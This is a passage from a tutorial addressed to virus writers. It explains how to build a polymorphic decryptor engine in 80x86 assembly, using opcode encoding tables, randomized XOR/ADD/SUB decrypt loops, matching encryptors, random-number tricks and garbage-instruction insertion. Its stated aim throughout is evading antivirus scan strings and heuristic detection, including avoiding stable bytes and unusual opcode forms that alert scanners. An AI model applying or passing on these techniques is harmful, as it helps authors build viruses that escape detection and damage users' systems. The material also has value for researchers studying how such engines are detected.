eg: BX=1234, [BX]=what's at offset 1234
<crypt> = a crypt instruction, eg: XOR, ADD, SUB
= add 2 to the <reg16> (add 1 for byte encryption)
The engine will fill in all variable values:
[1] It selects (from a table given by the programmer) a random register to
work with. In this example the engine will store the MOV instruction
encoded with the correct register (more on this later), after which it
will store the offset of the first encrypted byte (or word) of the virus.
[2] After that, it selects (again from a table given by the programmer) a
decrypt operation. Note that the engine has to remember which decrypt
operation it chose, because later on, the virus has to be encrypted in such
a way that the previously generated decryptor will correctly decrypt the
virus. That’s right, the encryption method is derived from the generated
decryptor. The engine stores the crypt-instruction, and then it will
generate a random value (c.f. immediate) which will accompany the crypt
operation. Again this value needs to be remembered, otherwise later on, the
virus can’t be encrypted so that the decryptor works. For example, if the
random value is 1234 and the crypt-operation is XOR and the register is BX,
the crypt-instruction is XOR [BX],1234 (duh). The engine stores the value,
and repeats [3] for a (random) amount of times, as one single encryption
operation yields a weak encryption.
[3] Add 2 to . Advanced engines make a choice whether to use byte or
word encryption, this engine uses word encryption. The
register needs to be increased by two, so that in the next decryption loop
the decryptor will decrypt the next word.
[4] Compare the register to EOV (end of virus). Speaks for itself.
[5] If we haven’t reached EOV yet, jump and decrypt the next byte/word.
4.1 Register Encoding
In this example the engine wants to pick a register. To understand how this works we need to take a look at instruction encoding of the 80x86. If you don’t have technical documents at hand you can easily grab SoftIce and a Hex-Bin calculator to start investigating. Here’s a piece of MOV reg16,reg16 when I looked at it:
INSTRUCTION HEX BINARY
MOV AX,AX 8BC0 10001011 11000000
MOV AX,BX 8BC3 10001011 11000011
MOV AX,CX 8BC1 10001011 11000001
MOV AX,DX 8BC2 10001011 11000010
MOV BX,AX 8BD8 10001011 11011000
MOV BX,BX 8BDB 10001011 11011011
MOV BX,CX 8BD9 10001011 11011001
MOV BX,DX 8BDA 10001011 11011010
MOV CX,AX 8BC8 10001011 11001000
MOV CX,BX 8BCB 10001011 11001011
MOV CX,CX 8BC9 10001011 11001001
MOV CX,DX 8BCA 10001011 11001010
(…)
Obviously, the first byte in a MOV reg16,reg16 instruction always is 10001011b or 8Bh. The second byte
only changes a little if we alter the registers. A closer look reveals that bit 5-7 always remain 110.
NOTE: The bit most to the right is called bit 0, so the bit most to the left is the last bit: bit 7. A byte consisting of 7 bits instead of 8? No, bit 0 is the 1st bit, so bit 7 is the 8th bit.
The last bits remain 110. Now it looks like the rest of the byte changes all the time, which is indeed the case. I hear the attentive reader shouting: but what about the 5th and the 3rd bit?! Well, in this example I didn’t use the 16 bit registers SI, DI, SP and BP. Those ones can also be encoded, and they require that third bit.
Conlusion: 10001011 11… = MOV reg16,reg16
Note that the first three dots are filled by bits representing the TARGET register, ie. the one to the left, and the second three are representing the SOURCE register, the one to the right.
The attentive reader probably noticed that I just explained the MOV reg16,reg16 instruction, while the MOV in the example engine doesn’t need the two registers after the MOV, but only one register and an immediate (the starting offset). Let’s take a look at that:
INSTRUCTION HEX BINARY
MOV AX,1234 B83412 10111000 00110100 00010010
MOV CX,1234 B93412 10111001 00110100 00010010
MOV DX,1234 BA3412 10111010 00110100 00010010
MOV BX,1234 BB3412 10111011 00110100 00010010
MOV SP,1234 BC3412 10111100 00110100 00010010
MOV BP,1234 BD3412 10111101 00110100 00010010
MOV SI,1234 BE3412 10111110 00110100 00010010
MOV DI,1234 BF3412 10111111 00110100 00010010
This time it may be more interesting to look at the Hex values than to look at the binary values. I have sorted the instructions a bit, so it shouldn’t be hard to see a pattern. The difference with the previous example is that the ‘register encoding’ in the instruction is now done in the first (and only) byte of the instruction itself. The whole instruction takes three bytes: one for the instruction itself with a register encoded in it, and in the other two the immediate is stored, in Intel little-endian format.
When we further analyze this example, we see that (in the first byte) only the last three bits change every time. Considering the fact that 3 bits are necessary to encode 16 bit registers in instructions, that should be fine.
Conclusion: 10111… 00110100 00010010 = MOV , 1234
Now it’s time to list the registers and how they’re encoded in instructions. Looking at both examples we can easily spot following:
AX = 000b = 0h
CX = 001b = 1h
DX = 010b = 2h
BX = 011b = 3h
SP = 100b = 4h
BP = 101b = 5h
SI = 110b = 6h
DI = 111b = 7h
All usable 16bit registers are listed here (IP doesn’t count), and we can see that they all just fit in the available 3 bits. What a coincidence… Write this list down, you’ll be needing it.
The question is now, how do we tell the engine to do this? Very simple: the boys at Intel invented the OR instruction. I think many beginner virus writers do not know the exact purpose of this instruction, while for simple COM/EXE techniques this instruction is seldomly used. I think you should keep that in mind… :
0 OR 0 = 0
0 OR 1 = 1
1 OR 0 = 1
1 OR 1 = 1
But you’re probably wondering: for what purpose would I ever want to use this instruction? Well, what it actually does, is making sure that in the target byte all bits are SET (=1), which are set either in value 1 OR in value 2. And this is very useful for register encoding: Remember our “wildcard” for MOV ,? It was: 10001011 11… = MOV ,, with the first three dots for the target reg16, and the second three for source reg16. Say we fill the dots with zeros, and then OR them with the encoding value for registers. Say we wanted MOV BX,CX. First we’d want to move the value 10001011 11000000 (the basic value for MOV ,) in a register, otherwise the CPU can’t work with it. We’ll put it in AX:
MOV AX, 8BC0h (use your bin2hex calculator)
Then we want to have the encoding value for the target register in bit 3-5, and the source register in bit 0-2, because the MOV instruction requires us to do so. BX=011b and CX=001b, so when we put this together we get: 011001b What happens when we OR this value with AX (which contains the value for a
MOV instruction): OR AX, 19 (again use the bin2hex calculator).
AX = 8BC0 = 10001011 11000000
19 = 00000000 00011001 OR
---------------------
10001011 11011001 ;which is 8BD9, which is MOV BX,CX
Mission accomplished, you now know how to encode registers in instructions.
4.2 Picking a register
One of the first things an engine needs to do, is to pick a register to work with. Here we will see a big drawback of this particular decryptor layout example. In this example we are using registers to point to memory locations, that means e.g. XOR [BX],1234. Due to the 80x86 architecture, we are limited to but four registers to do that, namely BX, SI, DI and BP. So XOR [AX],1234 for example is an illegal instruction. Only those four registers are capable of this addressing mode.
*There's one problem with BP though. Let me show you something:*
81 37 34 12 XOR WORD PTR [BX],1234
81 77 01 34 12 XOR WORD PTR [BX+1],1234
In the first instruction, we’re addressing with just the register, without a relative offset. In the second instruction, we DO have a relative offset, and it is encoded in an extra byte. Note that the second byte changes from 37 to 77 when we introduce the relative offset. On bitlevel, 37 and 77 only differ 1 bit, namely the sixth. This is of course to let the CPU know whether there will be a relative offset or not.
81 34 34 12 XOR WORD PTR [SI],1234
81 74 01 34 12 XOR WORD PTR [SI+1],1234
The same story goes for SI. When there is no relative offset accompanying the register (in other words: relative offset = 0), the instruction looks different. And it also applies to DI, but not for BP.
81 76 00 34 12 XOR WORD PTR [BP+00],1234
81 76 01 34 12 XOR WORD PTR [BP+1],1234
As you can see, when there is no relative offset accompanying the register, it’s still encoded, simply as a zero byte.
What does this have to do with the engine? Well, in the decryptor in the example, we’re addressing without a relative offset. For SI, DI and BX goes that there will not be a zero byte to let the CPU know, but just a bit set or unset in the instruction byte. This is a good thing, because otherwise we would have a stable byte (i.e. a byte that’s the same in each decryptor generated), namely the zero. So if we wanted the engine to be able to pick registers from a list which included BP, we would have to write a routine
that checks if he picked BP, and if so, adjust the instruction byte, and write the extra zero. Of course, for the purpose of creating decryptors as random as possible, this is a good idea. This, however, is an advancement to be worked on when you finished a working engine. I’m giving you a good advice here: don’t try to create a complex engine right away, first start with a simple but working ‘framework’, which you can expand later on. If you start including all kinds of nice features, you’ll probably just end up debugging and that for a very long time.
Back to the example. I’m assuming we’ll just use BX, SI and DI, so we don’t have to deal with that relative offset. Just put the register encoding values for BX, SI and DI ina table, and let the engine choose from them.
Maybe you’re wondering why I told you this whole story about BP and it’s relative offset. It’s not really that important and specifically a problem for this type of decryptor layout, and I also just could’ve told you:
don’t use BP in this example. I didn’t, because I wanted to let you know you can’t just “assume” stuff, and you should check everything.
4.3 Moving
In the example engine, we want to have MOV , imm16, which looked like:
10111... 00110100 00010010 = MOV <reg16>, 1234
We don’t want the 1234, so forget the last two bytes. Important is that the instruction byte (the first byte) is 10111…, with a register encoding value filling the last three dots.
Example: how would we make the engine generate a MOV SI,0120 in the decryptor? We’d first have to fill the dots in the unencoded value for MOV , imm16 with zeros, so we can OR the value to the correct opcode. From now on, when I’m talking about an unencoded value for an instruction, I’m assuming the dots are filled with zeros. Okay, so the unencoded value for MOV , imm16 is B8h (converted in hex), let’s put that value in AX. Then, we’d have to OR AX with the correct register encoding value. We wanted SI, whose value is 6h (110b) so we will perform: OR AX,6h.
4.4 Decrypting
Let me first of all mention once again the fact that the strategy behind most engines is that first the decryptor is generated, and after that the correct (matching) encryption is applied to the virus. Just to prevent some confusion.
´Now, we want to make a decryptor, and we want each decryptor to be as random as possible. So we have to give the engine as much as possible crypt operations. XOR, ADD and SUB are good examples, because they have the same instruction layout. They work with 2 operands, for our purpose we will have
the pointing register, and a random 16 bit immediate, so e.g. SUB [BX],1234. It’s a good to include more crypt operations like NEG, NOT, INC, DEC, but the disadvantage of these other types is that they have other instruction layouts, and therefore require separate routines for including in the decryptor. If you decide to include more crypt operations in your engine, these four are a good choice, because they all require one operand, and for our example engine that would be a pointing register, e.g. not [SI]. Let’s just say our example engine uses only XOR, ADD, and SUB.
Again, to build an instruction, we need to know the unencoded value for the instruction. Assuming the dots (where the register encoding should take place) are filled with zero-bits, here are the values:
XOR: 81 30 xx xx
ADD: 81 00 xx xx
SUB: 81 28 xx xx
Please note that these are the values for use with pointing registers. So with these values, you would be able to produce an instruction like XOR [SI],1234 but not XOR SI,1234 ! We need pointing registers for our example engine, so the above values will do.
Another important note: the first byte is 81, no matter what crypt instruction the engine picks… That’s not the best solution, because the whole idea of the engine is that we wouldn’t have “stable bytes” in the decryptor. So you can see you can’t just do with only these three crypt operations, simply
because it’ll create a stable byte. As said, it is wise to ignore this for the time being, and first try to create a working engine. Then you can start working on problems like these. Well, you actually need to work on them, because if you leave stable bytes in your decryptor, you still haven’t eradicated the possibility for scan strings.
Okay, back to the program, say the engine picked ADD to include as crypt operation. We can simply store the 81, while it doesn’t need any register encoding. Then we have to encode the correct register in the second instruction byte. Earlier, we encoded just the registers in the instruction, and now we need to encode pointing registers in the instruction. I haven’t given you the encoding values for the pointing registers, so here they are:
000b = 0h = [BX+SI]
001b = 1h = [BX+DI]
010b = 2h = [BP+SI]
011b = 3h = [BP+DI]
100b = 4h = [SI]
101b = 5h = [DI]
110b = 6h = [immediate]
111b = 7h = [BX]
You should see a possible advancement: addressing using two registers. For example, set BX to zero, and let SI be the pointing register, but now use [BX+SI] instead of just [SI] to address the correct byte/word. That results in more randomness.
OR 30h with the correct register encoding value, store the byte, and store a random 16 bit immediate. Don’t forget to “remember” which cryptop the engine stored, and which immediate it used. Most engines create an encryptor along the way, which can be executed when the decryptor is generated.
This is only one crypt operation. Just repeat this step a couple of times, depending on how much crypt operations you want in your decryptor.
4.6 Increasing
Now it’s time in the decryptor to increase the register. Since we’re using word encryption, the register needs to be increased by two. Obvious instructions are two INCs; ADD reg, 2; or maybe even SUB reg, -2. But also consider string instructions like SCAS, CMPS, STOS, LODS and MOVS. They perform an action, and then increase SI, DI or both. That could suit our purposes quite well. However, be careful with these, as for instance MOVS may have some unwanted results. I think you should be able to find the correct values for these instructions. To make this tutorial not too longwinded I will only shortly explain the use of the two INCs, as you now should be able to figure out the rest yourself.
The unencoded hex value for INC is 40hex (hi P/S) and you should encode it with the normal register encoding values (not the pointing registers, because that would be a crypt operation! (compare INC BX and INC [BX])) to get the necessary result. E.g. INC SI would be OR 40, 6. With 6 being the register encoding value for SI. This should be clear by now. not the pointing register values), and store the result.
After that, we’ll have to store the imm16. This value is the last byte/word that needs decrypting. How do we calculate this value? Rather simple: starting offset + code length. Code length is passed to the engine using CX, and the starting offset can be calculated by memory offset + decryptor length. Memory offset was again a parameter for the engine, namely AX, and the decryptor length shouldn’t be hard to calculate. If your decryptors are always the same length it’s easy, but when you have variable length decryptors, you should keep track of how many bytes you’re storing. So:
AX length CX
/---------------±--------------\ /----±-----\ /-----------±----------|
.---------------------------------.-------------.-------------------------.
| Host file | Decryptor | Virus body |
‘---------------------------------’-------------‘-------------------------’
last byte/word to be encrypted ------/
AX + decryptor length + CX = CMP operand
Add the values, and store it as operand.
4.7 Jumping
After the CMP comes a conditional jump. The obvious instruction would be JB, but that again introduces a stable byte, because we don’t have a substitute for it. Of course, JNA would be nice, but the problem is they have the same hex values, which is not so weird considering that they do exactly the same thing. What about JNZ? This could be interesting, but only if we’d add one/two to the CMP operand… Otherwise the last byte/word wouldn’t get decrypted… Again, I’m assuming we’re only using JB. (Note that IF you choose to use the JNZ feature the following explanation also sort of applies to it).
If the condition is met (condition = we’re below the last byte/word) the jump should jump back to the first decryption operation. How do we “encode” this? First of all, JB has 72h as hex value, so we can store that. As you all should know from COM infections, such a jump has a displacement byte right behind it. This displacement byte is the amount of bytes the CPU should move IP, where you should see the starting point at the offset of the next instruction (so 2 instructions behind the 72 of the JB). Here’s an
example:
0BF9:03B6 81 37 64 23 XOR [BX],2364
0BF9:03BA (...) (...)
0BF9:03C6 81 FB A4 06 CMP BX,06A4
0BF9:03CA 72 EA JB 03B6
0BF9:03CC (...) (...)
In this example the first decrypt operation starts at offset 3B6. The “next instruction” of which I was talking would start at 3CC in this example. So the correct calculation for the JB displacement would be:
New offset - Offset of next instruction = Displacement
3B6 - 3CC = FFEA
As you can see, we get FFEA as displacement. We can only use one byte, so that would be EAh. Now most of the time you would say that EAh = 234d, but there’s also something to say for EAh = -16d, and that’s exactly the amount of bytes the CPU should move. Note that you don’t have to worry about things like the memory offset, because it doesn’t matter where in memory this is located: The displacement will be the same every time, as the amount of bytes to move doesn’t change.
5. Encrypting
At this point we’re done with the decryption loop. Along the way I was telling you your engine should “remember” what it did. Sounds okay, but you’re probably wondering how that works. First of all, it is wise when making a table with crypt operations, to include the inverse crypt operations. E.g. store SUB along with ADD, ADD along with SUB, and XOR along with XOR. In that way, you can store the decrypt operation in the decryptor, and the inverse crypt operation (for encrypting) in the encryptor. Note that the
first instruction in the decryptor should have it’s inverse operation as last operation in the encryptor.
6. Randomize
Throughout this tutorial I told you to let your engine pick something at random. Most high level languages have functions which return a “random” value, but, as usual in assembly language, we get to do it ourselves.
As there is no way you can actually make a computer return a totally random value, because it just can’t do that, we have to build a routine that gives us a value as random as possible. The most used way to get a random value is reading from port 40h. Because the value isn’t really random, it’s wise to perform some calculations, which would randomize the number some more. Another possibility is to let the decision depend on a value like system time or date.
BTW: when you manage to do this correctly, you’ll get a form of slow
polymorphism.
Experiment with calculations and write a program which outputs the random values to screen on bitlevel. Investigate the values to check if they really are quite random. Note that this is quite important, and if you rely on a bad randomizer, you’ll end up with some options of your engine getting disabled, as they’re never reached.
Once you have a random value, and you want to use it to decide e.g. which cryptoperation you will use, you have to AND it out to e.g. the offset of the last value of the table. (If you don’t understand what AND is: AND makes sure that in the result byte only those bits will be set, which are both set in the first operand AND in the second operand.If necessary, re-read the part about OR, and investigate AND in the same way, i.e. try to get to know what it really does.) So, if you have 5 options, AND the random value out to 4, so you can add it to the starting offset of the table. Don’t AND it out to 5, because the starting offset + 5 is just behind the table. This is because at offset 0 there is a value too. So, if you have x values, AND the random value out to x-1.
There is one problem though, which is overlooked by some writers. Get your hex2bin calculator, and start ANDing random values with 4h. Say you do it 100 times, you’ll only get either 4 or 0 as a result. You’ll NEVER get 1, 2 or 3. Hmm… weird… Let’s try it with 5h. Perform AND xx,5 with 100 values, and you’ll get 0, 1, 4 and 5. But NEVER 2 or 3. To understand this problem, we have to look at the values we’re ANDing with at bitlevel:
0h = 00000000b
1h = 00000001b
2h = 00000010b
3h = 00000011b
4h = 00000100b
5h = 00000101b
6h = 00000110b
7h = 00000111b.
When ANDing with a value, bits in the result byte will only be set if they’re also set in the value you’re ANDing with. Say you’re ANDing with 5h, and you’d want to get 3h as a result. 3h equals 10b so that means that in the value we’re ANDing with, bit 1 should be set. Because the value we’re ANDing with is 5h, and that equals 101b, bit 1 can NEVER be set. So you’ll never get 3h as a result. Again, this is quite important, because if you choose to neglect this problem, you’ll end up with some features of your engine simply being disabled…
I hope you already have a feeling that values with all (necessary) bits set are suitable for ANDing with, as the result of the operation varies from 0 to the value you’re ANDing with, which is what we want. So 1b (mostly unnecessary), 11b, 111b, 1111b and so on, are values suitable for ANDing with. If you have too few options in your table and can’t think of another option to fill the table with (so you can AND with one of the mentioned values), you could simply put duplicate options in your table. This isn’t as unsophisticated as it may seem at first glance, as some options are more flexible than others: e.g. when deciding whether the engine should use normal INC or a string operation (LODS, STOS, etc.) for increasing, the option for “use a string operation” is attractive for duplicating in your table, as it has more sub-options (later on, the engine has to decide which string operation it should use) than the “use an INC” option.
Please note that this is just one way of working around this problem. At this point you can make use of your creativity to come up with another solution if you wan to. But somehow I can’t imagine that it’s really efficient memory-wise.
7. Sidenote
One more important note. When working on your own engine, you’re probably planning on adding some nice features. And when you’re including new instructions, you need to know the unencoded values of these instructions. If you’re not instantly running SoftIce in the background it’s probably very tempting to use DOS DEBUG to check out the values. Never do that… There is something very strange about the 80x86 architecture:
Some instructions can take two different identities. E.g. the instruction “OR AX,AX” can take “09C0” as “identity”, but “0BC0” gives us the exact same instruction.
All so called “official” assemblers like Borland TASM, Microsoft’s MASM and allothers, pick the same of the two choices they can make, namely the “highest” (so “0BC0” for “OR AX,AX”). In other words, if a certain instruction takes an identity which normally wouldn’t be produced by regular assemblers, it
is very likely this is the work of some polymorphic engine. Some (or most?) antivirus programs know this and alarm if they find such an instruction. I recommend using SoftIce anyway (although it’s assembler also has some bugs), but if you for some strange reason don’t or can’t, use Borland’s TurbodeBugger
to check the values, I guess that should do the trick too.
A sidenote to this sidenote: The still ever popular A86 shareware assembler has a nasty side-effect to it.
At times, it seems to pick the “wrong” one of the two possible instruction codes, resulting in the same alarms being produced. This can easily be avoided by using the TASM Assembler. There’s no reason for not using TASM anyway.
8. “Garbage”
Garbage instructions are instructions included in the decryptor, which serve no real purpose for the execution of the decryptor, but are only included to hide the so obvious real purpose of the decryptor. Without any garbage, the decryptor actually looks like a decryptor, which makes it very easy to spot heuristically. Furthermore, garbage instructions will let the “real” instructions be at random places (in a constant order of course). In one generation the increase and compare operation are right next to each other, while in another generation some other (do-nothing) instruction is included between them.
The classical concept of garbage instructions consists of including one-byte do-nothing instructions like NOP, CLC, STC, INT 3 (the only one-byte interrupt (CCh)) between the actual decryptor instructions. Nowadays, the use of these one-byte instructions has become rather trivial, as almost all AV programs just ignore these instructions when they encounter a decryption loop.
These one-byte do-nothing instructions have also lead to something AV calls variable scan strings. In these scan strings, it doesn’t matter if you have zero or thousands of garbage instructions between two constant values, the AV program just ignores those, and just checks if the two constant values occur in the right order (so, first the increase, then the compare instruction, here assuming these are stable bytes in the decryptor). In other words, these one-byte garbage instructions really serve no purpose anymore.
Furthermore, AV has noticed that huge amounts of these kinds of garbage instructions in a relatively small area are very likely to be the results of a polymorphic engine. In other words, using these one-byte do-nothing instructions can result in heuristic flags being triggered.
Luckily, there are other ways of producing “garbage code”. The basic idea behind all of them is producing code which could be code required for the program to run correctly. A nice example is including some stupid Int21 call, like GetVersion or something. There are a lot of possibilities here. Each time take two things in account:
(*) Whatever garbage you use, make sure it doesn't influence the
execution of the decryptor, but also make sure it LOOKS like useful
code
(*) When using large garbage constructions (like the setting up of an
Int21 call), make sure you have enough variations, otherwise AV could
make a scan string (or some more if that would be enough) just from
your garbage code!
Things to be considered are the possibility of including some nice armor tricks in the garbage construction (I’m calling it construction because sometimes the “garbage” doesn’t consist of just one instruction anymore), but again, make sure to have enough variations, because armor code is of course
uncommon code, which AV loves, because they can make scan strings of it…
For those wondering how to include garbage instructions/constructions at random: Just place a call to your insert_garbage_at_current_offset before each major decryptor operation. An extremely simplified example:
start:
call maybe_insert_garbage
call set_up_registers
call maybe_insert_garbage
call perform_move_instruction
call maybe_insert_garbage
call do_first_crypt_operation
call maybe_insert_garbage
(...)
9. Multiple Decryptors
A virus writer which for some reason doesn’t want to include a complete engine, but still wants some variation in his decryptors may consider the use of a couple of constant decryptors. They all do the same thing, but they look different. Here, the variation isn’t on instruction level, but on routine level, which is far more simpler to implement. This technique can be called polymorphic in it’s true meaning (poly=many, morph=shape), but as just a few routines are generated, it’s often called oligomorphic (oligo=few). On it’s own this method isn’t considered optimal regarding this kind of type of malware, as a set of scan strings can be used to identify every possible generation.
The combining of these two methods however gives a very large variety of both decryptor layouts and decryptor instructions, which can be considered strong polymorphism (don’t mix it up with something in the object-oriented programming language world). Most of the more powerful engines combine the two methods, and are therefore very hard to detect reliably.
10. Conclusion - The very end of this article
Throughout this tutorial I have tried to explain how to avoid constant
values using variation on instruction level. If you want to extend your engine
with variation on routine level you’ll have to use well-considered code. The engine
should decide which decryptor layout (routine) it will generate, and then it
should generate that particular routine. As some things have to be done in
more decryptor layouts (e.g. increasing the register) it’s often wise to make
routines (for e.g. increasing the register) which are independant on from which
decryptor-layout setup they are called from. So the increase_pointer routine
(which on his turn chooses from a variation of instructions) must be able to
be called from different layout setups.
As you may have noticed this article is rather long and was time consuming to write. I hope it was at least at some points understandable.
If the resonance suggests it, I might just release another article about oligomorphic or even metamorphic Assembly (depending on what you might want to have released…?)…
Greetings.